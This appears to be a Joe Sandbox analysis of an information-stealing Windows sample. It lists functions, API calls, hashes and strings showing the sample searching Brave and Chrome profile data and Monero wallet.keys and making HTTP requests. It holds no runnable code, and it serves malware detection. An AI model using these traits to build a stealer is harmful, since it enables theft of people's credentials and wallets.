Instruction Fuzzy Hash: FFA11CB5504200EFC744EFA8EC98A1A3FBABB8C681B50951DE50EC7264DF34A8C5DB64

Function 00954610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0095465F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 009547EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009546BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009547AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009547C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009546C8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954672
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095478F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009546B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009546D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009546FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009547B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009546A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009547CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954622

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 8f2cfdf08f425376d4b9ed1b8cf0653507d3de23084f8c0453adf434f7510584
Instruction ID: 7867800600e1330cd3d831a38d9fdf5320ef8a4a11652a98bc2d657c7616e0d6
Opcode Fuzzy Hash: 8f2cfdf08f425376d4b9ed1b8cf0653507d3de23084f8c0453adf434f7510584
Instruction Fuzzy Hash: 3B41F4616C2708AFE6E8F7AC8C43E9D77569FC270EFB19044EC1A56282EFF065014666

Function 0095BCB0 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

FindFirstFileA.KERNEL32(00000000,?,00970B17,00970B16,00000000,?,?,?,00971398,00970B0F), ref: 0095BD35
StrCmpCA.SHLWAPI(?,0097139C), ref: 0095BD8D
StrCmpCA.SHLWAPI(?,009713A0), ref: 0095BDA3
FindNextFileA.KERNELBASE(000000FF,?), ref: 0095C5FF
FindClose.KERNEL32(000000FF), ref: 0095C611

Strings

Google Chrome, xrefs: 0095C474
\Brave\Preferences, xrefs: 0095C01B
Brave, xrefs: 0095BF42
Preferences, xrefs: 0095BF5E

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: d9bfdd2ba506b7c8273798d3380bc73577679b82feb6c37b1664ce32f5f7cf7d
Instruction ID: 0145cddfa8e72dd3c69fa68eaf72d99b87ffe26e4033588039155bc7271df386
Opcode Fuzzy Hash: d9bfdd2ba506b7c8273798d3380bc73577679b82feb6c37b1664ce32f5f7cf7d
Instruction Fuzzy Hash: 5542FE729141089BCB14FB60DC96FEE737DABD5300F408558F90AA6191EE35AF48CFA2

Function 6C6735A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C6FF688,00001000), ref: 6C6735D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6735E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6735FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C67363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C67369F
__aulldiv.LIBCMT ref: 6C6736E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C673773
EnterCriticalSection.KERNEL32(6C6FF688), ref: 6C67377E
LeaveCriticalSection.KERNEL32(6C6FF688), ref: 6C6737BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6737C4
EnterCriticalSection.KERNEL32(6C6FF688), ref: 6C6737CB
LeaveCriticalSection.KERNEL32(6C6FF688), ref: 6C673801
__aulldiv.LIBCMT ref: 6C673883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C673902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C673918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C67394C

Strings

GTC, xrefs: 6C673912
AuthcAMDenti, xrefs: 6C673946
QPC, xrefs: 6C6738FC
GenuntelineI, xrefs: 6C673639
MOZ_TIMESTAMP_MODE, xrefs: 6C6735DB

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 81aa848bdf0ff1b5a4f893ab737a37b5ebc876d352032505d3e1a3297de56531
Instruction ID: 19efee6e53d458ba148fe980800ed72d67073c053ae41af0c54b9a023f1586b1
Opcode Fuzzy Hash: 81aa848bdf0ff1b5a4f893ab737a37b5ebc876d352032505d3e1a3297de56531
Instruction Fuzzy Hash: 7FB1B471B093109BDB18DF2AD49461A7BF7AB8A700F04893DE5A9D3750EB309801CB9E

Function 009643F0 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0096440C
FindFirstFileA.KERNEL32(?,?), ref: 00964423
StrCmpCA.SHLWAPI(?,00970FAC), ref: 00964451
StrCmpCA.SHLWAPI(?,00970FB0), ref: 00964467
FindNextFileA.KERNEL32(000000FF,?), ref: 0096465D
FindClose.KERNEL32(000000FF), ref: 00964672

Strings

%s\*, xrefs: 00964400
%s\%s, xrefs: 009644DB
%s\%s, xrefs: 00964484

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: b88c540ceedebc5c1d505a6d3e9a054e8be220f44085fa6550511e76f45bb246
Instruction ID: eddd93b36adb21693ba9412e73e3b2ea9a56b23e645ebcbe6ed11fb14de41461
Opcode Fuzzy Hash: b88c540ceedebc5c1d505a6d3e9a054e8be220f44085fa6550511e76f45bb246
Instruction Fuzzy Hash: 22612472900218ABCB24EBA0DC45FEA777DAB89705F00859CF50D97151EF74AB89CFA1

Function 009548D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0095483A
Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954852
Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954868
Part of subcall function 00954800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954889
Part of subcall function 00954800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954899

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00954965
StrCmpCA.SHLWAPI(?,0120F340), ref: 0095498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00954B0A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00970DC3,00000000,?,?,00000000,?,",00000000,?,0120F390), ref: 00954E38
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00954E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00954E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00954E99
InternetCloseHandle.WININET(00000000), ref: 00954EFD
InternetCloseHandle.WININET(00000000), ref: 00954F15
HttpOpenRequestA.WININET(00000000,0120F3F0,?,0120EE20,00000000,00000000,00400100,00000000), ref: 00954B65

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

InternetCloseHandle.WININET(00000000), ref: 00954F1F

Strings

------, xrefs: 00954CB9
", xrefs: 00954C42
------, xrefs: 00954B78
", xrefs: 00954D83
------, xrefs: 00954A0D

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 0096f0281eec4fac789d985d6ebd78d50c363e65833f39024798870cde0560a5
Instruction ID: d50bf429fcc793e1366a3ec8106c5b877db3d064e5bbd9d7680def7af1005bf1
Opcode Fuzzy Hash: 0096f0281eec4fac789d985d6ebd78d50c363e65833f39024798870cde0560a5
Instruction Fuzzy Hash: B4120E72954118AACB15EB90DCA2FEEB778AF95300F504199F50A73091EF716F88CF62

Function 009639B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 009639D3
FindFirstFileA.KERNEL32(?,?), ref: 009639EA
StrCmpCA.SHLWAPI(?,00970F7C), ref: 00963A18
StrCmpCA.SHLWAPI(?,00970F80), ref: 00963A2E
FindNextFileA.KERNEL32(000000FF,?), ref: 00963B7C
FindClose.KERNEL32(000000FF), ref: 00963B91

Strings

%s\%s, xrefs: 009639C7

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
